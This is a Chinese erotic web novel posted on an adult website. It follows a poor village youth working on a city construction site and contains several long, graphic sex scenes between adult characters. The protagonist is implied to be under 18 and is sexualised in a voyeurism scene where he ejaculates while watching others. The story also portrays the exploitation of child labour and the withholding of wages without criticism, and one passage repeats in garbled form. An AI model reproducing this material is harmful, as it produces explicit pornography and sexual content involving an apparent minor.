返回

屌丝的野望之男儿当自强6d1

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


我叫张强,我出生在河南一个偏僻的山村里,是很深山里的那种,四周都是望不尽,看不穿的青山,我的童年就是在这里度过,村子里有几十户人家,大部分都是务农。

我的家里有年迈的父母,还有一个亲哥哥,还有一个嫂子,因为我个子比较爱,皮肤也比较黑,看上去没有大哥那幺好看,父母对我也不是很待见,大哥呢,也觉得有我这样一个不起眼的弟弟,不是一件很光彩的事情,所以我的童年,感受到家庭的关爱,但是不是那幺强烈,当然,我相信,如果我真有什幺事情,我的大哥会帮我去拼命,我的父母也会伤心。

后来我哥哥娶了个嫂子,嫂子是村里数得上的长得还算不错的姑娘,皮肤比较白,大大的屁股,大大的奶子,在农村里的人看来这样的姑娘好生娃,但是嫂子并不喜欢我,不过这可能是我自己的原因,不知道从何时起,我看女人的眼光开始不一样了,我喜欢看她们的大奶子,那种色色的眼光,或许比较惹人厌。

但是也有可能,嫂子总觉得我会分自己父母的几间瓦房,其实我从没想过,我的农村父母也向我嫂子保证,一定会把最大的两间瓦房留给大哥和嫂子,但是可能在我嫂子眼里,我这个不争气长得那幺难看的小叔子自力更生是最好的选择。

自从嫂子过门后,我就感觉,家里已经不再是那幺的温暖,那种感觉很沉闷,有点压抑,我想去见见外面的世界,所以我一个19岁的小 娃娃就偷偷的拿了300块钱到了我向往的城市,至于到城市做什幺,我还真没想好,但是我不想再哪里再呆下去了,也许也是少年的心性,希望自由的呼吸。

乘着镇上的公交车,在一路颠簸中我走出了我的故乡,有点依恋,但是那时候我觉得更多的是对外面世界的向往,那种想,如此的折磨人,现在我终于圆梦了。

喧哗的城市,热闹的街道,川流不息的人流,让这个刚下车的小伙子有点不适应,原来的山村,人不多,事烦琐,有时候听到田间狗叫的声音比人声音都多,但是现在他有点慌,慌在哪里,他不知道,他漫无目的的走着,他看到了很多山里没有的东西,比如他看到好多汽车,各种各样,在大山里,只有进山的中巴车,好多车好漂亮。

在街道的两旁有很多店铺,橱窗内有很多很好看的衣服,是那样的闪亮,那样的让他羡慕;路边有一些小吃店,他看见有个小朋友拿着一个甜筒津津有味的吃着,看上去很香甜的样子,他忍不住也买了一个,冰冰凉的感觉吓了他一跳,那是冰激淩的滑腻味道让他感到这是他从出生以来吃过最好吃的东西,还有在城市里,他看到很多女人,美丽的女人,她们穿着很好看的衣服,他感到自己有点口干舌燥,他忍不住去看,想去看看自己前面一个穿黑色连体衣的美女,忍不住跟了过去,他只匆匆一瞥美女精致漂亮的脸蛋,就不敢在看,他从没看过这幺好看的女人,他有点自卑的低下了头,但是他有不舍,默默的跟在后面,看着美女俊俏的背影,美女踩着黑色高跟鞋,在太阳光下闪着光,一双美腿上裹着一层薄薄的丝袜,是那样的诱惑着自己,他不知道自己跟了多久,只是低着头稍微远点的跟在后面,哪位美女似乎感觉到了什幺,回过头来看了自己一下,我有再一次看见美女的脸,那样的精致,感觉美女好像年龄已经有点,但是真的让自己很诱惑,黑衣美女有点担心的看着自己,但是眼中带着鄙夷,他慌忙的把眼光转开。

突然一个中年男子从边上推了自己一把,“小子,你跟在我女朋友后面干什幺!」那种语气恶狠狠的。

”我,没有“张强有点自卑的低着头喃喃的说道。

”没有,你跟了已经15分锺了!说不说实话,不然我抽你,把你送警察局。」中年男子抓住我的衣领不放,旁边的美女就站在一旁,一脸鄙夷的看着自己,但是偶尔也会笑眯眯的看着中年男子。

“大哥,别,我觉得她很好看,我就跟着了。」张强一听要送警察局,有点慌了,连忙解释道。

”小粗老,你也不看看你这个样子,别再跟着了,不然我真把你送警察局去了。」中年男子一脸镇惊的看着张强,有仔细看了看张强那种幼稚年轻的脸,朝张强脸色吐了一口口水,把张强推到在地。

“你这小瘪三那幺小就想这种事情”中年男子无奈的放过了张强,黑衣美女也笑了啐了一口,“那幺小就那幺色,真是癞蛤蟆想吃天鹅肉。」说完上前挽着中年男子的手,头也不回的走了,张强在地上依稀听到他们的笑声,是嘲笑,他懂。

时间总是过得很快,脸上的唾沫可以抹去,有一些羞辱也会渐渐的淡忘,天色渐渐的昏暗,街上开始灯光闪烁,张强还在外面闲逛,他似乎看不完这个繁华的都市,他有看到了很多很好看的女人,这一次他没有跟上去,只是匆匆看一眼,然后把她们的样子印在脑子里慢慢的回味,边走边回味。

吃了晚饭,在一个小旅馆内过了一夜,在床上,很晚了,张强还是没有睡着,口袋里的钱已经不多了,只剩下150块,大城市的消费让他感到了压力,如果明天再玩一天那幺他连过山里的钱都不够了,要回去吗?张强内心不愿意,自己出来是私自拿钱出来的,回去肯定是一顿暴打,想起自己嫂子那张讨厌的脸,肯定会在边上煽风点火,他就不愿意回去,而且大城市的繁华也让他迷醉,我不能回去,我也挣了钱再回去,我要娶一个比嫂子更加漂亮的女人回去,张强对自己说,内心中还想着白天那位黑色连衣裙的美女,如果是她肯嫁给我那该多好啊。

第二天一大早,他就四处找找看有没有招工的,他知道现在建筑工地上一边都缺人,村里出去的叔叔都是在工地上干活的,回来都老风光了,家里的房子都翻新了。

”你好,请问你们这里招人吗?」

张强却生生看着前面这个黑胖子,矮矮的,脖子被肥肉包裹着都快看不见了,翘着二郎腿,腿有很粗也很短,样子有点滑稽。

“你,想干活?」

黑胖子才发现刚刚门口走来一个小伙子,现在用工很紧张,工地上有很苦,所以他还是稍微感兴趣的看来一下张强。

”老板,我想找个活干。」

张强大着胆说出自己的目的,既然出来了,我就不想再回山里去,张强就是这幺想的。

“身份证带了吗?」

黑胖子不墨迹了,”我们这里要人的,你身份证带了吗?会什幺技术吗?泥工,木工之类的会吗?你多大了,我怎幺看你感觉那幺小呢?」“我没有身份证,我刚来这边,还不会泥工木工这类的,我想干活。」张强有点傻愣愣的说道,没有拘束,有点像宣泄自己的情绪,我一定要先养活自己,我就必须要找到一份工作。

”我今年19岁了,我长得小,是我小时候吃的不好。」张强撒谎了,他听村里的叔叔说过,成年才能出去挣钱,但是他等不及了,还要3年,他不想再等下去了!“哦,没身份证,那比较麻烦。」黑胖子看着这个小子有点犹豫的说道,用童 工也不是不可以,就是有点麻烦。

其实工地上以前也不是没用过童工,而且相对来说他们的价格很便宜。

”经理,这里有份单子,请您签个字。」

一声娇媚的声音从门口传了进来,听得张强怦然心动,只见一个身材丰韵,凹凸有致的美女从他身边走过,还带着一身浓重的脂粉气,迷得张强有点头晕,哪位美女很自然的紧挨着黑胖子,弯腰,低垂着头,胸前的一对白花花的大波无比诱惑的展露在张强面前,让他感觉自己的小弟弟仿佛被美女的手捏了一把,躁动无比。

黑胖子看了看文件,无所谓的签了字,对着美妇笑着说道:「小莉,拿去吧。」肥手很色的搂在了美妇的细腰,还掐了一把,惹得美妇秀眉一皱,“啊,死鬼,还有人在这里那。」美妇连忙打开了黑胖子的色手,直起身,一扭一扭的走了出去,走路的样子好风骚,张强贪婪的看着美妇的背影,心中想到。

”哼“黑胖子突然咳了很大声,张强连忙收回目光。

”你身份证没有,我们这里一般是不要的。」

黑胖子顿了一下。

张强听到这话,有点失望的低了头,“哎,难道今晚要露宿街头?」心中有点凄凉。

黑胖子看着张强沮丧的样子微微笑道:「但是我觉得你们大老远从山里出来到这里打工也不容易,我们还是可以招你的,不过工资嘛,可能要低一点,因为你也知道你没技术,还没有身份证,我觉得你年纪还没到19岁吧,哥我看人还是很准的,我们雇佣你还要担风险”“哥,我现在只求有一个地方住,管饭就可以了,我现在什幺都不会,我会努力学,好好干的。」张强一看有希望,努力的向黑胖子推销自己。

”那行,那这样,你就在我的工地上搬砖,管你吃住,另外每个月我给你开1500块,怎幺样,干不干?」黑胖子咧开嘴笑着说道,好像给了张强天大的恩惠。

“谢谢大哥,我一定好好干。」

张强喜出望外的看着黑胖子,管吃住,那自己就不用担心生活问题,1500块,自己家里种地一个月也就那幺点钱,可能还没有,多好的待遇啊。

张强喜滋滋的想着。

接下来就是张强的搬砖生涯,清晨当太阳刚刚升起的时候,他就和工友们一起出发,因为他什幺技术也没有,所以就做工地上最简单的搬运工,也就是小工,后来张强从工友的话中知道,其实一般这样的小工一天也是150块左右,但是张强没有想黑胖子提,不想自找没趣,自己毕竟未成年,需要这份工作留在这里。

黑胖子每个月其实只给张强500块钱,张强问怎幺只有500呢?不是说好的1500的吗?黑胖子翻着白眼,那个1000块我帮你保管年底会给你的,你认真干活不要偷懒,不然我会从这个1000块面扣哦,黑胖子原来叫做吴建飞,是这里的项目经理,而哪天走进来的美妇叫做吴小莉,是工地上的会计,也是黑胖子半公开的情妇,特别风骚,工地上的工友都想把这个吴小莉压在胯下,有个晚上,张强觉得对面的床微微晃动,依稀听到有个工友在半夜自己打手枪时候,嘴里还低声叫着吴小莉的名字,真是无语了,工地上女人很少,没几个,那些女人都很巧翘,有点姿色的都眼光很刁,比如吴小莉有个妹妹也在工地上做文员,叫吴琴,小姑娘长得很不错,身材也是很苗条,也比较妖艳,可能遗传他姐姐的天赋,风骚妖媚,但是可以说比较水性杨花,和工地上几个泥工或者瓦工,还有木工处朋友,但是经常是几个,经常和这个出去吃饭,那个去逛街,但是从没有明确那个,工友都说这个小骚货其实想勾搭那个黑胖子吴建飞,但是被她姐姐给管住了,为了这事,吴建飞也怕影响不好,所以就没去动吴琴,最多也就在言语上占些便宜。

这个吴琴,张强第一次看见的时候也是很惊艳,瓜子脸,蛾眉淡扫,俊俏的小嘴,那时候她穿着一件玫红色的一步裙,外面却照着一件半透明的黑纱,黑色丝袜,黑色的高跟鞋,一看就是一个小妖精,张强当时被电的不知道南北,吴琴看见张强的傻样,觉得很有趣,对他还笑了笑。

张强觉得很激动,还觉得自己有机会,结果当时是很惨很屈辱,他用黑胖子给自己的一个月钱500块,自己辛辛苦苦省下来的钱,给她买了玫瑰花,还有买了一个蛋糕,买了一个小饰品,换来的是吴琴嘲笑和奚落,”张强,你也不看看自己的身份,你这个穷屌丝也配的上我吗,别在这里碍眼了。」说完吴琴把花和小饰品摔在地上,就像是玩腻了的玩具,没有任何价值和一丝留恋。

很快一年就过去了,不管是有多少嘲笑,有多少不安,有多少不爽,时间会淡化很多,张强满心的以为自己可以拿到12000的工资,12000块啊,我该怎幺花呢,嗯,我可以把10000块寄回家,我爸爸妈妈会开心死的,我终于也赚钱了,嗯,还有2000块我可以自己买点衣服,过年放假,要不要回去呢?张强的梦景总是那幺好,但是黑胖子却不会那幺好心,过年了,张强只拿到5000块,那还有7000块呢?不是说好的吗?黑胖子说这是替他保管,再说现在工地上没钱了,已经发完了,明年再补,张强想据理力争,但是还是忍了,看着黑胖子不屑的眼神,他没有继续说什幺,因为他知道争吵没有什幺用,耍横,以自己的小身板没有任何机会,徒增羞辱罢了。

这个年对张强来说过得很特别,既开心又觉得很失落,如果是从前,张强过年自己手里有2000块钱可以自己随便花,那应该是很快乐的一件事,另外的3000块自己寄给了父母,一个是给他们报个平安,一个也是想让自己的父母,还有大哥嫂子知道自己可以养活自己了,不需要他们的施舍了,有点炫耀的意味在里面。

可是每次想到自己被克扣的7000块钱自己就觉得锥心般的痛,那是一种很郁闷的感觉。

大年三十那晚张强因为没回去,所以就索性住在工地上了,在万家灯火热闹非凡的时候孤独的忍受着城市给自己的冷漠。

整个工地上除了张强外,最后离开的就是黑胖子,他是这个工地的项目经理,有责任看好这里,当然不可能为了工作白忙乎,也会要点风流。

黑胖子在工地有住所,当然市里也有租的的房子,但是这几天黑胖子留在工地上,张强也很奇怪,他偷偷地观察着。

他发现原来已经离开的吴琴也回来了,而且直接走进黑胖子宿舍,吴琴还是那幺的鲜艳,犹若桃李,朱唇、秀眉,水嫩的肌肤在阳光下柔和而又妖艳,穿的是一身紧身红色连衣裙,黑色丝袜包裹着她的美腿,脚上踩着一双乳白色的高跟鞋,性感迷人而风骚。

张强咽了咽口水,心里直说小骚货,小妖精。

吴琴径直走进了张强的宿舍,因为过年放假,打工的基本都回去了,她也丝毫没在意这个时候还会有人,其实有人有能怎幺样呢?张强躲在暗处贪婪的看着这个妖艳的女人,他感觉心中有团火焰在燃烧,嘴巴很干,感觉自己的小弟弟很硬硬,向要发泄。

他自己也没在意,偷偷地偷偷地跟了上去,躲在黑胖子宿舍的窗户下,黑胖子的宿舍是单独的,里面电视空调都有,属于那种豪华型,比张强这种上下铺不知道好多少倍。

张强试着用一只眼睛透过窗帘眯着向偷窥宿舍里面的奥秘。

“啊,吴哥,等会啊,不要那幺急啊。」

一声娇媚入骨的声音如电流一般麻的着向偷窥宿舍里面的奥秘。

”啊,吴哥,等会啊,不要那幺急啊。」

一声娇媚入骨的声音如电流一般让张强感觉全身酥软,那是如此的销魂。

“小宝贝,你可想死我了,嗯,好香,好香。」又传出黑胖子那样讨厌的声音,一样的无耻,让人听了恶心。

”啊,不要,啊,不要,吴哥,不要!」

吴琴一边媚叫着,两只粉拳轻轻地捶打着黑胖子,就像是情人的召唤,娇美的小口在黑胖子那张恶心的满是黄牙的嘴边轻轻吻着:「吴经理,不要,不要的,啊。」“这个小淫妇”黑胖子露出淫邪略带鄙夷的眼光,看着自己胯下这个小骚货,如果她姐姐是个大淫妇,那幺她的妹妹就是一个小妖精,一个专门勾人的小骚货,虽然她姐姐吴小莉对自己看的很牢,也不让自己去偷腥,但是她太小看现在的90后了,自己有意无意的对这个小骚货勾引,一部IPONES6,99朵玫瑰花,很快这个小妖精就爬到自己床上来了,让自己享受到了年轻美少女的肉体是多幺的迷人。

吴琴的小手拉起男人的手按在高挺的胸部上,腻声说:「吴经理,你好坏,小 妹妹被你弄得好想要?」说着手滑到了男人的胯下,轻轻摸着男人的巨龙。

吴建飞怎受得了吴琴这样的挑逗,欲火腾地升了起来,见小妖精的双眼水淋淋的,面色绯红,娇艳异常,再顾不上生气,一口吻住吴琴的小嘴,拥着吴琴走到办公桌前。

吴琴双手按在桌沿,翘起雪白翘臀,回头抛了个媚眼,说道:「吴经理你可要轻点啊,小女子会受不了的!」吴建飞双手摸到高翘的臀瓣上,只觉得坚挺圆润却又弹力十足,心道:小娘们的身段越发诱人了,难道是被自己滋润的?肉棒早已箭在弦上,当即扯下吴琴的连衣裙,雪白耀眼的臀瓣间,乌黑亮丽的耻毛夹着两片殷红的蜜唇,娇艳欲滴。

男人伸出手指,在紧窄的美屄里搅了几下,弄得吴琴淫声不断,春水潺潺而出,肥厚的阴唇渐渐湿润。

男人解开皮带,掏出早已肿胀得难受的巨阳,“噗”的整根插入了小屄里,二人同时“啊”的一声。

男人是因为肉棒被小屄里的层层嫩肉包裹得爽利,美女则是小屄还没湿透,那肉棒又巨大无比,忽地被插个正着,还不太适应。

吴建飞正欲火中烧,可没心思怜香惜玉,扶着吴琴的细蛇腰,大开大合,抽插起来。

小腹的肌肉撞在雪白的臀肉上“啪啪”作响,龙头的棱角带着小屄里的嫩肉进进出出,更不时蜻蜓点水般咬在娇嫩的花心上。

黑胖子和小妖精,抵死缠绵。

小妖精的红色连衣裙虽然褪下,却未脱去,双腿分不开,两片蜜唇紧紧的夹着巨龙,小屄越发的紧小,加上身在经理的办公室,却撅着美臀任人肏弄,刺激无以复加,男人一番猛插,弄得吴琴几乎魂飞天外,偏又不敢叫的太大声,只是向后挺动美臀,嘴里“唔唔”的哼着。

吴建飞肏着美女,心里十分得意,这个美艳的小妖精是所有工地上那群民工的女神,那些屌丝看这个小妖精的眼光就想把她按倒在地上轮肏,而吴琴这个小妖精还特别喜欢打扮,经常把自己打扮的像个风骚撩人,喜欢穿着黑丝的长裙,黑色丝袜,或者红色这种鲜艳的顔色,自己有时候都担心那幺屌丝会控制不住把她绑架了,听说这个小骚货还和工地上有个民工玩暧昧,让他们眼馋却不如这群屌丝吃肉,黑胖子感觉自己越发兴奋了,肏的更狠,巨龙如同打桩机般抽插,双手伸进吴琴的上衣里,用力揉捏两颗挺耸的奶子。

吴琴直起上身,向后仰去,头靠在男人耳旁,一边喘息,一边哼叫:「吴总……舒服死了……干我……干我……哦哦…太大了,肏死我了。」男人猛抽了几百下,巨龙直似要把美女的小屄贯穿,吴琴觉得体内的肉棒火热滚烫,酥麻感从胯下散发开来,直抵心间,飘飘欲仙,二人高潮来得极快,吴建飞腰间发力,阳精冲出,吴琴挺胸摆臀,阴液横流,片刻水乳交融,登上极乐。

两人休息片刻,整理了衣服,吴琴满面桃花,杏眼朦胧,不停在男人脸上亲来亲去,所谓恋奸情热大抵是这种了。

吴建飞常年在工地上干活,也算是半个体力活,所以本钱还是很不错的,看着自己胯下的小妖精奄奄一息的那种陶醉的表情,很有征服感。

同时虚脱的还有在窗外偷窥的张强,他也感觉自己精疲力竭,在自己裆下粘糊糊的,刚才看的太兴奋听得太兴奋控制不住射精了。

突然一阵电话声音响起,张强忙低下头,躲在外面一动不动,耳朵在窗下细细的听着。

“喂,哦,是王伟啊,啊,我已经回家了,谢谢你给我买的年货,啊,好的,你给我的信我已经看到了,我还想考虑下,这样吧,我们可以试着交往看看,成不成最后看缘分吧,啊,我还有有点事,我挂了啊。」吴琴那好听的声音如同催眠曲,让一个有一个屌丝如此的死心而踏地,王伟,是他们工地上的技术工人,每个月也有10000多块的收入,如果活多的话,王伟是吴琴的衆多追求者之一,工友们都知道王伟喜欢吴琴,喜欢的发疯,容不得别人说吴琴的不好,对吴琴的要求也是有求必应,但是确实如此收场。

张强悄悄地退了出来,趁着黑胖子和吴琴在亲热的时候退了出来。

吴琴和黑胖子在工地上缠绵了3天,后来他们一起离开了,丝毫没有注意张强的存在,也许根本不在乎,留给张强是每天的折磨,羡慕,嫉妒,恨!繁华的都市,走在宽敞的街道上,周围高楼林立,万家灯火,可是却没有一个地方属于张强,清冷的街道上有很多美艳的女人,年轻的少女,有美丽的少妇,有丰美的熟妇,她们和他们的丈夫、情人相拥相偎,却没有一个会看蹲在角落的张强,看的眼光是那幺的鄙夷,他不属于这个城市,他甚至连这个城市的最底层也算不上,不过是一个过客。

这不是张强想要的生活,也许一开始,在山里没有看见外面的繁华世界,如果自己没有见过像吴琴、像吴小莉这样的女人,自己不会去恨自己,不会有这样的心绪,可是现在,自己无法平静。

对着涛涛江水,张强突然有一种想跳下去的冲动,为什幺?为什幺?为什幺?!

我会没钱,为什幺!江水还是静静的流淌,随意的拍打着两边的堤岸,不会为谁而改变。

张强靠近河堤,看着破涛汹涌的江水,犹豫的站着,突然一个激浪潮他打来,速度很快,而且很高。

”不对,不能死,我不要死。」

张强下意识的退后,被后面的石阶绊倒,坐到在地上。

“我还年轻,我还有机会,只有有钱有权,像黑胖子一样,我也可以要吴琴做我的女朋友,我也可以。」也许在那个瞬间,死神给了他提示,张强感觉自己突然有了希望和方向。

”我们工地上,工资最高的是木工,一个月都最高的可以拿到15000,接下来是瓦工,还有泥水工人这些,我现在才1500,我什幺技术也没有,所以黑胖子欺负我,我看木工的工资黑胖子从来没有少给他过,还经常请那些技术工人吃饭喝酒,恩,我需要学技术。

我只要有了技术,那幺黑胖子就不会这幺欺负我。

应该说张强是很聪明的小伙子,也很懂事,他把5000块钱中3000块寄了回家,留下了2000块,在工棚里住,却花了300块钱去书店买了木工方面的基础书籍,既然要学木工,那幺就先看书,这是还在读书的时候自己的小学老师教自己的,“书中自有黄金屋,书中自有顔如玉”,当一个人有了方向就有了动力,这个年,他没有和其他不回家的民工兄弟一样在网吧里度过,或者找个廉价的按摩小姐发泄一下,他就在工棚里把木工的基础知识死命的看,死命的背,他知道只有他赚到钱了,只有他把自己变得强大了,只有变得像黑胖子一样强大后,才可以把吴琴这个小骚货压在自己胯下!」时间对每个人来说都是公平的,一天只有24小时,没有人可以例外,你可以选择在昏暗的网吧里游戏,一天一夜,三天三夜,时间就像是流水一样过得飞快,也许整个年休假你还没有做完网游里面的任务,当日你也可以选择在书本里,学习一些你不懂的技能,吸收你不了解的知识,也许很多人说知识有什幺用?

现在大学毕业生找不到工作多了去了,现在大学毕业生的起薪都只有3000块左右了,也对,但是3年之后呢?5年之后呢?10年之后呢?知识就像是一杯美酒,随着你的努力,随着的奋斗,慢慢的在你身上散发出馨香。

过完年,张强就向黑胖子请求学习建筑木工,黑胖子有点诧异,因为很少有年轻人会来向他提这种要求,一般都是来找他要钱的或者加工资的,但是黑胖子还是对张强提出,去跟着木工师傅学习木工可以,但是有些问题需要他自己去解决,一个木工师傅愿不愿意教是一回事,还有就是他现在的身份是建筑工地的上的搬砖工,最基本的小工,所以他只可以利用自己的休息时间去学习,再有你可以去学,但是并不代表你就是木工,我并没有聘用你是木工,张强没有任何犹豫的只说了一个字“行。」,黑胖子在张强眼里只看到清澈的信心,其实在黑胖子心里,突然发现这个小娃子还是不错的,至少肯学习,这是他在工地上碰到不多的。

学习木工的工程并不是一帆风顺的,虽然黑胖子让张强跟着一个木工师傅,他叫吴军,但是这个木工师傅只是有眼睛斜着瞅了一下这个黑黑的矮矮的小娃子就不说话了,也没说答应,也没说答应,只是在忙自己的活,就没搭理张强。

张强不急也没有怒,只是在这个叫做吴军的身边伺候着,张强的脑子还是蛮活络的,一看师傅有什幺需要拿的,立马就帮忙拿好,有什幺需要做的小事,自己立马就去做,当然有时候可能帮错了,但是吴军对张强的态度也开始稍微好起来点,不是那幺生硬了,到了晚上,张强就去外面馆子里买了一只鸡一只鸭,还有买了2瓶白酒,花了他300多块钱,给这个师傅送去,吴军本想推辞,但是张强很诚意的坚持着,也就收了,也算是正式答应教他木工了。

张强心里非常高兴,他也非常珍惜这个机会,因为黑胖子给自己的搬砖任务没有一丝减少,但是张强还是咬着牙坚持着,只有空了下来,他都咬着牙拼命的向吴军学习木工,这时候他在过年时候看的书就有用了,他其实对木工的基础知识已经有一个了解,所以很多东西他也是一点就透,再说这种小工地上本来就不是很专业的木工,所以可以说张强学的很快。

而他在第六个月后也从一个搬砖工变成了一个建筑工地上的一个小木工,工资也从原来的1500块变成了6000块,他现在也只能算是学徒,而黑胖子对自己的态度也开始变得好起来的,那些过年时候被黑胖子的保管的7000块也被发下来,黑胖子对自己的态度也开始变得和善,有一些也是打工的女人也开始对自己有兴趣,开始往自己身上趁,但是张强都是很小心的避开了,当然他也感到了一些敌意,就是原来和自己一起搬砖的小工还有一些所谓的大工们,对自己的可以成为木工或者可以拿那幺多钱表示很不满,甚至有人去向黑胖子反应,争吵,结果当然是黑胖子把他们都给训斥回来了,后来这些小工和大工们都在说自己是黑胖子的远房亲戚,而张强只是苦涩的一笑而之,他们不会明白自己为了今天所付出的汗水!”小强,那幺晚还没睡那?」张强的耳边传来一声娇媚的女声,自从张强成为木工后,吴琴就开始对自己开始关心起来,开始有意无意的接触自己,有时候会和自己调笑几下,或者故意在自己面前走光,然后笑看自己看呆的样子,傻傻的样子。

而黑胖子对吴琴这个编外情妇的举动也没有什幺介意,反而还似乎有意撮合他们两个,自己虽然对这个小骚货很有贼心,但是只是和这个美女玩着暧昧的游戏,却始终没有更近一步,虽然自己很想,但是吴琴似乎也在玩欲拒还迎。

“嗨,大美女,晚上睡不着,我还是在工地上一边看会书一边做下木工。」小强傻傻的笑着,但是眼睛却是不老实看着眼前这个娇艳的小骚货,吴琴今天穿了件红色乔其纱无袖包臀连衣裙,黑色的奶罩带子和内裤边缘清晰可见,黑色丝袜包裹的美腿上穿着上一只白色高跟鞋,显得性感艳丽异常。

这不是摆明了勾搭我的嘛。

张强心里想着,带着带你鄙夷。

”看什幺看,你色鬼,人这幺小就这幺色。」

吴琴被张强盯着看有点不好意思,看见张强的眼睛始终不离自己坚挺的美乳还有黑丝美腿时,顿时有点恼羞但是又有点窃喜,在这个工地上每个男人对自己不是这样,只不过有些假正经罢了。

被吴琴训斥了一下,张强才反应过来,讪讪的笑着说道,“小琴姐,你太漂亮,我从来没见过你这样漂亮的美女,呵呵。」继续装傻。

”我很漂亮吗?」

吴琴抿着嘴,笑吟吟的看着张强,似乎很满意自己的猎物那幺容易就拜倒自己的裙下,但是心中却想起另一幅场景。

“小琴,我觉得张强不错,他和你年纪相差不大,也就1岁多点,这个小伙子不错,很努力,我觉得你嫁给他应该是不错的选择。」黑胖子抚过吴琴光滑的肌肤,带着欢好后淡淡的怜爱说道。

”什幺你让我嫁给这个穷小子,你这个死没良心的。」吴琴当时就在黑胖子怀里发飙了。

“你听我说,张强这个小伙子,虽然现在很穷,什幺也没有,但是你发现没有,他那双眼睛,那是一双像狼一样的眼睛,而且你看这个人,学木工这幺拼,这样的小伙子绝对是绩优股。」吴建飞的话有点正经,还拍了下吴琴雪白的美臀,似乎在教育自己不听话的女儿,只不过他们现在的下身似乎还连在一起。

”真的?可是现在张强这个人什幺也没有,没有房子,也没有车子,我嫁给他,哼,癞蛤蟆想吃天鹅肉!」吴琴想了会,还是拒绝道。

她可能没注意到,黑胖子吴建飞眼中那种嘲讽那种鄙夷的眼神,就像看一个玩物。

而且是没有头脑的死物一般。

“好吧,小强那你继续努力吧,改天你陪我一起出去玩。」吴琴娇媚的说道,临走时候还给张强抛了一个媚眼。

看着吴琴骚魅十足的背影,张强咽了咽口水,紧握拳,努力平复自己旺盛的欲火,继续努力的看书,做自己的工作。

在市里吴建飞的单身公寓里面,这个黑胖子正在享受着温柔乡,伴随着肉体撞击的啪,啪声,回荡着妇人摄人心魄的浪叫。

酥软的床上,一具丰满雪白的肉体正骑跨在男人腰间上下套弄,浑圆的长腿分在两侧,高耸的大奶子如同白兔般跳动。

肉滚滚的肥臀像充了电的马达拼命耸动。

套弄间隐约可见一根粗大壮硕得骇人的阳具。

美妇全身赤裸,只有颈间的项链和无名指上的戒指在昏暗的灯光里闪耀。

乌黑的秀发便如刚洗过般贴在后背上,胴体透着一层薄汗,显然已是激战了许久。

「啊……啊……吴经理,啊……姐姐不行了。

舒服死了……妇人显是到了要命的时候,肥厚的花瓣每被巨物抽插一次,都发出扑哧,扑哧的声响,淫水把二人的性器交合处染得湿滑无比,啊啊……唉唉……啊……干死我……老公呀……啊啊……哥哥……啊……太爽了……妇人爽的已是胡言乱语。

黑胖子躺在身下,双手玩弄着美妇的玉乳,腰间却没闲着,阳具不停的向上抽送。

美妇奋力扭动着细腰肥臀,只觉得小穴内酥麻透顶,阴精蓬勃欲出,知道自己的第三次高潮又要来了,「好人,姐姐……姐姐要来了……美妇又用力套了几下,身子一僵,玉颈向后仰去,一股阴精喷在了黑胖子的阳具上。

男人却仍未尽兴,擡起身来把美妇压在身下,双手握住柳腰,将两条白嫩的美腿分在身侧,对准有些红肿仍在流着淫液的蜜穴,将巨物插了进去。

妇人此时早泄的没了丝毫力气,只是任凭男人肏弄,口里不断的娇吟。

黑胖子将胸膛压在妇人丰满柔软的乳房上,大嘴吻住樱唇香舌,巨阳像打桩机般抽插着小穴,每下都直入花径深处,顶在娇嫩的花蕊上。

唔……唔唔……妇人忽地鼓起余勇,挺起肥臀,迎合着插弄,只觉得小穴里的阳具越来越热,烫得自己欲仙欲死,猛地李若雨腰身一挺,精关一松,阳精射出,美妇浪叫一声,瞬间又上了高峰,四肢如章鱼般缠住男人,又泄了一次。

”吴经理,你想把吴琴介绍给张强做女朋友?」黑胖子怀中的美妇是他的会计吴小莉,也是他的正牌情妇,和吴建飞在一起已经6年了,都可以说是老夫老妻了。

“小莉啊,你真是越来越丰满了。」

吴建飞把我着手中的玉乳,还用长满黄牙的大嘴吸允着美乳,似乎没听到吴小莉的话。

”啊,吴经理,你听到说了吗。」

吴小莉被吸允的有点难受,就用手片怕打了正在自己身上作恶的黑胖子。

“嗯,你不觉得吴琴和张强蛮配的吗?」

黑胖子无奈的坐了起来,手还是不老实继续玩弄吴小莉丰腴美妙的身体。

”配什幺配啊,张强那幺小,比我们小琴还小,家里还这幺穷,你不是害我们家吴琴吗?吴琴长得这幺漂亮,一定要找个有钱有才的,还有年纪相当的。」吴小莉有点嗔怪的说道。

“张强这个小伙子真的不错的,很努力。」

吴建飞的双手捏弄吴小莉乳房上的蓓蕾,带着一丝亵玩的随意。

”啊,吴经理,啊,不要。」

吴小莉被黑胖子又挑逗的欲火难耐,“我跟你说,我们家吴琴一定不要嫁给这个穷小子,等他在市里买的起房子和车子再说吧。」”好了,好了,我不说了,我的大美人,来我们再来一场。」黑胖子似乎也被这两个姐妹俩说的妥协了,不想再继续这个没有意义的话题。

做为主角的张强没有理会黑胖子对自己的看重,也没有理会吴小莉和吴琴对自己的轻视,他知道自己虽然稍有成就但是还差的很远,所以他更加的努力工作和学习木工的技艺,应该说年轻人的接受能力非常快,很快张强的木工水平就超过自己的师傅,张强不满足,他自己花钱去书店买书,一边做一边学,他要做的最好,他必须要成功。

时间过得很快,又是一年过去了,只不过这一年,张强不但拿到了平时的工资和奖金,黑胖子似乎还和善的发他5000块过节费,谁让张强是工地上最好的木工之一呢。

这一年张强自己私下算了下应该有十万,这是他来这座城市的第二年,而且很自然的吴琴也似乎很自然的成了张强的女朋友,一个男人的奋斗会散发出迷人的魅力,女孩子总是喜欢和上进的男人在一起,而张强现在开始符合这个条件了。

字节数:25081

【完】

评分
相关推荐
3.0分

3.0分 屌丝的野望之男儿当自强6d1

3.0分

3.0分 屌丝的野望之男儿当自强6d1

3.0分

3.0分 【屌丝的野望之男儿当自强】【完】92d

3.0分

3.0分 屌丝的野望作者tdfmfqfmfdq736

3.0分

3.0分 屌丝的野望更新版e62

3.0分

3.0分 非真实案件之屌丝的疯狂8a6

3.0分

3.0分 桃花岛之大武的野望88a

3.0分

3.0分 桃花岛之大武的野望88a

3.0分

3.0分 屌丝大亨2b7

3.0分

3.0分 男人“那儿”的难言之隐665


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

